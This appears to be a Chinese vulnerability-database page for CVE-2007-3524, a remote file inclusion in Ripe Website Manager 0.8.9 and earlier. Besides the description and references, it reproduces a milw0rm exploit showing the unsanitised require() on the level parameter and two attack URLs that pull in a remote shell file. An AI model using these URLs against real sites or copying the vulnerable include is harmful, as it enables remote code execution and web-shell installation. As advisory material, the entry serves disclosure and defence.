Ripe Website Manager 多个文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113227 漏洞类型 未知
发布时间 2007-06-30 更新时间 2007-07-05
CVE编号 CVE-2007-3524 CNNVD-ID CNNVD-200707-031
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/4129
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-031
|漏洞详情
RipeWebsiteManager0.8.9及之前版本中存在多个PHP远程文件包含漏洞。远程攻击者可以借助(1)admin/includes/author_panel_header.php或(2)admin/includes/admin_header.php的level参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
#Author::   BlackNDoor | blackndoor@learntohell.net
#Homepage:: www.learntohell.net
#
#Script::   Ripe Wepsite Manager
#Version::  <= v0.8.9
#Type::     Remote File Include
#
#Source::   http://sourceforge.net/project/showfiles.php?group_id=194532

#Bug::
   -> Files:

      /admin/includes/author_panel_header.php
      /admin/includes/admin_header.php

   -> vulncode:

      <?php
         ...
         define("LEVEL", $level); // directory level
         
         // includes
           require(LEVEL.'../includes/config.php');
         ...
      ?>

#Exploit::

   http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
   http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?

#thanks:: str0ke

# milw0rm.com [2007-06-30]
|参考资料

来源:MILW0RM
名称:4129
链接:http://www.milw0rm.com/exploits/4129
来源:SECUNIA
名称:25898
链接:http://secunia.com/advisories/25898
来源:OSVDB
名称:37800
链接:http://osvdb.org/37800
来源:OSVDB
名称:37799
链接:http://osvdb.org/37799
来源:XF
名称:rwm-level-file-include(35188)
链接:http://xforce.iss.net/xforce/xfdb/35188
来源:BID
名称:24722
链接:http://www.securityfocus.com/bid/24722
来源:VUPEN
名称:ADV-2007-2407
链接:http://www.frsirt.com/english/advisories/2007/2407